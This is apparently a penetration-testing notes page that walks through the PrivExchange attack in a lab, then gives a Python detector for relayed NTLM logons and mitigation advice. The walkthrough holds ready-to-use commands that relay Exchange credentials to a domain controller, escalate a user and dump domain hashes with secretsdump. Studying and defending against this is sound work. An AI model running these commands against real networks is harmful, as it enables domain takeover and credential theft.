# PrivExchange

## Good Resources to follow

{% embed url="https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/" %}

## Abusing Exchange with a credential

```
$ python3 privexchange.py -ah <My Internal IP> <Mail Domain Here> -u <Target Username> -d <domain name>

$ python3 ntlmrelayx.py -t ldap://<FQDN of DC here> --escalate-user <Target Username>
```

## Walkthrough

PrivExchange takes advantage of the fact that Exchange servers are over-permissioned by default. It was discovered by Dirk-jan a little over a month ago and is now an excellent way of quickly escalating privileges. It works by querying the Exchange server, getting a response back that contains the Exchange server's credentials, relaying the credentials in that response to the Domain Controller via ntlmrelayx, and then modifying a user's privileges so that they can dump the hashes on the domain controller.

Setting this up was kind of a pain. Exchange 2013 is installed using the default methods on a Windows 2012 R2 server, and I made this modification to the PrivExchange Python script to get it to work without a valid SSL certificate. After that, it ran fine.

First, start ntlmrelayx.py and point it to a DC, authenticate via LDAP and escalate privileges for a user.

```
$ python3 ntlmrelayx.py -t ldap:// --escalate-user
```

Then, run privexchange.py by passing in your attacker IP (`-ah`), the target, and the user/password/domain.

```
$ python privexchange.py -ah 192.168.218.129 LAB2012DC02.lab.local -u rsmith -d lab.local -p Winter201
```

privexchange.py makes the API call to Exchange. If the permissions are set as they are by default, we can escalate the targeted user to DA privileges: ntlmrelayx relays the Exchange server's credentials to the DC, then escalates the privileges of `<test user>`.

We can then use secretsdump.py to dump the hashes on the DC!

```
$ secretsdump.py /@ -just-dc
```

{% embed url="https://github.com/dirkjanm/PrivExchange" %}
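From the defender's side, the relay step leaves a trace on the DC: the Exchange computer account performs an NTLM network logon from the relay host's address rather than from the Exchange server itself. The following added example (not code from the PrivExchange project or the blog post above) checks a set of constructed event records, modelled on Windows Security event 4624 fields, against an assumed inventory of Exchange hosts and flags that mismatch.

```python
"""Flag NTLM network logons of an Exchange computer account that reach the DC
from an address other than the Exchange server's own (NTLM relay indicator)."""

# Constructed sample events (not real logs), modelled on event 4624 fields.
# Host names and addresses are made up for this example.
SAMPLE_EVENTS = [
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "EXCH01$", "IpAddress": "10.0.0.10",
     "WorkstationName": "EXCH01"},   # Exchange authenticating from itself
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "EXCH01$", "IpAddress": "10.0.0.77",
     "WorkstationName": "EXCH01"},   # same account, unexpected source address
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "EXCH01$", "IpAddress": "10.0.0.10",
     "WorkstationName": "EXCH01"},   # Kerberos, not NTLM: ignored
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "rsmith", "IpAddress": "10.0.0.55",
     "WorkstationName": "WS01"},     # ordinary user logon: ignored
]

# Assumed inventory: Exchange computer account -> addresses it should use.
EXCHANGE_HOSTS = {"EXCH01$": {"10.0.0.10"}}


def find_relayed_exchange_logons(events, exchange_hosts=EXCHANGE_HOSTS):
    """Return events where an Exchange machine account authenticated over NTLM
    (network logon) from an address not in its allow-list.  The workstation
    name is carried inside the NTLM messages and may still read EXCH01 when
    relayed, so the source address is the field that matters."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4624 or ev.get("LogonType") != 3:
            continue
        if ev.get("AuthenticationPackageName") != "NTLM":
            continue
        allowed = exchange_hosts.get(ev.get("TargetUserName", "").upper())
        if allowed is None:
            continue  # not an Exchange computer account
        if ev.get("IpAddress") not in allowed:
            hits.append(ev)
    return hits


if __name__ == "__main__":
    for ev in find_relayed_exchange_logons(SAMPLE_EVENTS):
        print(f"relay indicator: {ev['TargetUserName']} via NTLM from "
              f"{ev['IpAddress']} (claimed workstation {ev['WorkstationName']})")
```

Enabling LDAP signing and channel binding on the DC removes the relay target this heuristic watches for; the check remains useful as a second line of evidence.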
